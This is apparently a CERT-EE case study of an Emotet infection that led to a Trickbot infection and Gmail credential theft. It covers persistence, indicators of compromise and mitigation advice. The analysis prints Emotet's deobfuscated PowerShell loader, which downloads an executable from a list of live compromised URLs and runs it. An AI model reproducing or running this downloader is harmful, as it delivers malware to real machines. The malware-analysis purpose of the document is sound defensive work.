-
Case study: the tale of one Emotet infection By: CERT-EE /
Estonian Information System Authority Date: 23 October 2020 Tags:
Emotet, malware, cybercrime, Trickbot
Summary Emotet malware has been around since 2014. It is mostly
spread through malicious e-mail attachments, often disguised in
forwarded e-mails or as a reply to a previous discussion. As Emotet
uses hijacked e-mail threads to spread itself, the discussion and
the sender may look familiar to the victim and therefore he or she
is more likely to open the attachment. According to CERT-EE
estimation, there are tens of thousands of infected files sent
daily towards individuals and enterprises in Estonia, which
currently make it the most prevalent malware family distributed in
Estonia. As Emotet steals e-mails, there is also the risk of data
leak which can result in GDPR breach or contractual penalties.
Emotet is also often used as a downloader for additional malware
that can steal stored credentials from browsers. Therefore,
enterprises using cloud services should be extra careful and
require 2-factor authentication. The purpose of this case study was
to understand better how a current variation of Emotet works, so we
can recommend ways to mitigate the risks in advance and also what
to look out for in case of suspected infection. An important
finding is that while modern anti-virus software works against a
large variety of viruses, including Emotet, it is important to use
their full functionality.
Case study timeline For this case study, we were using Windows
10 v.2009 as operating system with built-in Microsoft Defender
antivirus with slightly modified settings. It should be noted that
infecting the machine in this default configuration was not
successful as Microsoft Defender removed the malware. For the
infection to succeed, Defender’s “Cloud-delivered protection” had
to be disabled.
-
Figure 1. Infected Emotet dropper .doc file where running macro
had to be enabled
After clicking “Enable Content”, a well obfuscated macro was run
that triggered a PowerShell in base64 and in obfuscated manner.
Figure 2. PowerShell in base64 and obfuscated
After deobfuscating and decoding base64 the following
instructions were found in the PowerShell command. --------
$P2t896q=Zgmfcmh; $Cpa3yo3=$*; $T9qq_nc=Gh2sw4h;&new-item
$eNv:useRprOFILe\QeZTn1z\P_WSvqA\ -itemtype dIrECtORY;
$Kcg966b=Rsthnuk;[Net.ServicePointManager]::"secUriTypROtocoL" =
tls12, tls11, tls; $Ua2xau0=R1x2d9w; $O0umshk=Zz2_fj;
$X8y3s56=S8s1vbu; $Wd0jfik=T7mjz5l;
$Zs8dvz7=$env:userprofile\Qeztn1z\P_wsvqa\$O0umshk+('.exe');
$Nj62m3r=Vj85wha; $Ly7vast=new-object NEtWEbClIENT; $Qqgc6sh=
-
http://financiamentointeligente.com/wp-content/Fj/*
http://www.removepctrojan.com/wp-admin/6/*
http://aahnaturals.net/wp-includes/TX/*
http://www.sff3d.com/3d/xk/*
https://engineering-2s.com/SS_Paypal/X/*
https://lsmanga.com/migration/FaU/*
https://beta.zoneberry.com/bysyswexecf/x3/ .spLiT($Cpa3yo3);
$Ka78g_w=P_awrw3; foreach ($Kk9rucd in
$Qqgc6sh){try{$Ly7vast."DOwnloADFile"($Kk9rucd, $Zs8dvz7);
$Pogmg4m=Quq7lrc;If ((.Get-Item $Zs8dvz7)."lEngTh" -ge 30706)
{.Invoke-Item($Zs8dvz7); $E5z9o9t=Ffm269h; break; -------- With
PowerShell Emotet malware is downloaded and executed in the
machine. PowerShell contained multiple sites from where to download
the payload of the malware. Since the first download site had been
taken down (step 1), the payload was delivered from the next site
(step 2) and the payload infected the computer. It then sent out
the data from the infected machine to the C2 (step 3).
Figure 3. Downloading malware payload and uploading data from
victim to C2.
In less than 30 minutes the infected device is turned into
Emotet spreading drone that, based on the instructions from C2, is
starting to send out new malicious dropper .doc files to new
victims.
Figure 4. Sending out Emotet droppers to new victims.
2.
3.
1.
-
In about 15 minutes from the infection the device is also
infected by Trickbot malware. Below is a typical Trickbot infection
of checking IP (step 1), downloading Trickbot payload (step 2),
sending out Edge formdata from the browser (step 3) and stealing
and sending out gMail password stored in the mail client of the
infected machine (step 4).
Figure 5. Emotet infected device being infected with Trickbot
malware
Figure 6. Trickbot stealing user credentials from mail client
for Google account
Trickbot injects itself to communicate with C2 into Windows
Problem Reporting manager service: wermgr.exe
Figure 7. Trickbot communication via wermgr.exe
To claim persistence Emotet writes itself to “HKEY_CURRENT_USER”
registry hive:
“HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”. Trickbot uses
Task Scheduler, as it creates task which executes on
user-logon.
1.
2.
3.
4.
-
Figure 8. Trickbot persistence
Four days later, Google informs that the account has been
suspended due to suspicious login.
Figure 9. Notification (in Estonian) that the account has been
suspended
After account recovery, it is evident from the logs that Google
disabled the account after a suspicious log in attempt from Vietnam
using the stolen credentials.
Figure 10. Login attempt from Vietnam that triggered account
suspension
-
Figure 11. Login attempt from Vietnam that triggered account
suspension
From the behaviour of Emotet, it is evident that on top of using
the infected device in sending out new malware, stolen e-mail
accounts are used to spread malicious files.
Figure 12. Google account was used for sending malware
Conclusion Emotet remains a villain that needs to be taken
seriously on its own as well as a source for new malware which in
our case was Trickbot. This proves that both malware families
remain up and running despite efforts to bring an end to them.
Based on this case-study, CERT-EE recommends enterprises to:
• consider using antivirus software to its fullest
functionality. Disabling features that different antivirus vendors
have developed to protect their customers (e.g. leveraging on
cloud-based information) means users are putting themselves and
their enterprises at risk;
• consider setting up a policy for mandatory and regular
“full-scans” and central management and alerting for antivirus
products;
• consider blocking/quarantining e-mails with documents that
contain macros or password-protected archives on perimeter so that
such attachments do not end up in users’ mailbox;
• for visibility and detection enterprises should ensure their
visibility is not reduced by moving devices outside their
perimeter. Visibility of the devices should remain through various
technical means such as “Always-on forced VPN tunnels”. The use of
split tunneling should also be weighed against the risk of
suspicious traffic bypassing firewall/IDS/IPS investments;
• since both Emotet and Trickbot used users profile directory
for its actions and persistence, enterprises should consider
enforcing AppLocker (Windows 10/Windows Server) policies. They
should be designed so that only in whitelisted
-
directories executable programs/scripts are allowed to be
executed, excluding users profile directory and any other, where
user has the right to write in;
• user should not have administrator role assigned to their
account. For administrative purposes there should be another
account which has limitations on other aspects e.g. no mailbox,
limited access to network resources etc;
• e-mail service providers should consider having similar checks
on e-mails containing malicious URLs and malware and disregard
delivery for both inbound and outbound traffic.
Disclaimer Microsoft Defender was not defeated by any means by
Emotet or Trickbot in this case study. In fact, we had to disable
“Cloud-delivered protection” to let mentioned malware to perform at
its most effective way to learn its behavior. We did not disable
Defender updates and after every update Defender turned its
“real-time protection” back to default setting: ON. This did not
require any user interaction. CERT-EE is a department of Estonian
Information System Authority that deals with cyber security
incidents that occur in Estonian networks and is in accordance with
NIS Directive and Cybersecurity Act the single point of contact for
Estonia.
IoCs URL: http[:]//financiamentointeligente[.]com/wp-content/Fj/
http[:]//www.removepctrojan[.]com/wp-admin/6/
http[:]//aahnaturals[.]net/wp-includes/TX/
http[:]//www.sff3d[.]com/3d/xk/
http[:]//engineering-2s[.]com/SS_Paypal/X/
http[:]//lsmanga[.]com/migration/FaU/
http[:]//beta.zoneberry[.]com/bysyswexecf/x3/ JA3:
72a589da586844d7f0818ce684948eea IP: 80.85.156.116 199.38.121.150
199.38.123.58 208.86.162.215 199.38.120.91 208.86.161.113
208.86.162.241 103.206.128.121 199.38.120.89 103.109.78.174
-
103.127.165.250 45.89.127.244 104.161.32.125 164.68.107.55
194.5.249.241 181.166.205.18 115.75.42.47 202.79.35.15
124.105.35.15 124.105.107.57 111.246.43.36